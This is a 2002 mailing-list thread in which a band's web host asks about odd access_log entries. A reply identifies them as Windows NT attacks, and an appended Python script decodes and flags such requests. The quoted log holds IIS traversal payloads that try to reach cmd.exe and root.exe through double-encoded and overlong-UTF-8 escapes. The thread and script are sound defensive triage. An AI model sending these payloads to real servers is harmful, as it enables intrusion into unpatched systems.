access_log

epsas at inflicted.net
Mon Jan 28 13:44:26 PST 2002


These are Windows NT attacks, which shouldn't affect you if you run Linux. 

Why are the IPs dashed out? "24.--.--.--7"   Is that your handiwork?

Good luck,
Charles


On Mon, Jan 28, 2002 at 11:00:59AM -1000, Todd Lee wrote:
> Hey everyone,
> 
> I was wondering if anyone out there could help me with understanding my
> access_log for httpd.  I was looking through it after setting up a new RH7.2
> box with monmotha's firewall script and the latest rpms from RHN.  I just
> host my band's website and e-mail.  Anyway, I got these entries that I don't
> quite understand.  It looks like someone was trying to run something on the
> box, just wondering how to interpret these. I changed the IP...just in case
> I'm wrong and this is totally innocent, hate to give out people's IPs
> unnecessarily...
> 24.--.--.--7 - - [28/Jan/2002:05:00:43 -1000] "GET /scripts/root.exe?/c+dir
> HTTP/1.0" 404 317
> 24.--.--.--7 - - [28/Jan/2002:05:01:02 -1000] "GET /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 315
> 24.--.--.--7 - - [28/Jan/2002:05:01:29 -1000] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
> 24.--.--.--7 - - [28/Jan/2002:05:01:48 -1000] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
> 24.--.--.--7 - - [28/Jan/2002:05:02:06 -1000] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
> 24.--.--.--7 - - [28/Jan/2002:05:02:25 -1000] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 356
> 24.--.-.--7 - - [28/Jan/2002:05:02:47 -1000] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 356
> 24.--.-.--7 - - [28/Jan/2002:05:03:27 -1000] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
> stem32/cmd.exe?/c+dir HTTP/1.0" 404 372
> 24.--.--.--7 - - [28/Jan/2002:05:03:46 -1000] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
> 24.--.--.--7 - - [28/Jan/2002:05:03:47 -1000] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
> 24.--.--.--7 - - [28/Jan/2002:05:04:06 -1000] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
> 24.--.--.--7 - - [28/Jan/2002:05:04:27 -1000] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
> 24.--.--.--7 - - [28/Jan/2002:05:04:31 -1000] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 322
> 24.--.--.--7 - - [28/Jan/2002:05:04:35 -1000] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 322
> 24.--.--.--7 - - [28/Jan/2002:05:04:54 -1000] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
> 24.---.--.--7 - - [28/Jan/2002:05:05:12 -1000] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
> 
> Thanks!
> -Todd
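
One way to triage requests like those quoted above, as an added example that is not part of the original thread: it parses Common Log Format lines, undoes repeated percent-encoding and the two-byte overlong UTF-8 forms (`%c0`/`%c1` lead bytes), and tags requests for `cmd.exe` or `root.exe`. The sample lines are constructed from request paths in the quoted log with a documentation IP (192.0.2.7) plus one benign line; the function and tag names are assumptions.

```python
import re
from urllib.parse import unquote

# Common Log Format: host ident user [time] "METHOD URL PROTO" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+)$')
# 0xC0/0xC1 are never valid UTF-8 lead bytes; they only occur in overlong forms
OVERLONG = re.compile(r'%c([01])%([0-9a-f]{2})', re.I)
TARGETS = ("cmd.exe", "root.exe")  # executables requested in the quoted log

# Constructed sample: paths from the quoted log, documentation IP, one benign line
SAMPLE = [
    '192.0.2.7 - - [28/Jan/2002:05:00:43 -1000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 317',
    '192.0.2.7 - - [28/Jan/2002:05:02:06 -1000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339',
    '192.0.2.7 - - [28/Jan/2002:05:04:06 -1000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338',
    '192.0.2.7 - - [28/Jan/2002:05:04:31 -1000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 322',
    '192.0.2.7 - - [28/Jan/2002:05:10:00 -1000] "GET /index.html HTTP/1.0" 200 1024',
]

def lax_overlong(m):
    """Character a lenient decoder yields by keeping only the payload bits."""
    return chr((int(m.group(1), 16) << 6) | (int(m.group(2), 16) & 0x3F))

def normalize(url, max_rounds=4):
    """Decode until stable; return (decoded_url, decode_rounds, saw_overlong)."""
    rounds, overlong = 0, False
    while rounds < max_rounds:
        overlong = overlong or bool(OVERLONG.search(url))
        step = unquote(OVERLONG.sub(lax_overlong, url))
        if step == url:
            break
        url, rounds = step, rounds + 1
    return url, rounds, overlong

def classify(line):
    """Return host, status, decoded URL and tags for one log line, or None."""
    m = CLF.match(line)
    if not m:
        return None
    host, _ts, _method, url, status, _size = m.groups()
    decoded, rounds, overlong = normalize(url)
    tags = set()
    if any(t in decoded.lower() for t in TARGETS):
        tags.add("windows-shell-probe")
    if re.search(r'\.\.[\\/]', decoded):
        tags.add("traversal")
    if rounds >= 2:
        tags.add("double-encoded")
    if overlong:
        tags.add("overlong-utf8")
    return {"host": host, "status": int(status), "decoded": decoded, "tags": tags}
```

Every sample probe was answered with 404 or 400, so the status field returned by `classify` is what separates a failed probe from a request worth investigating.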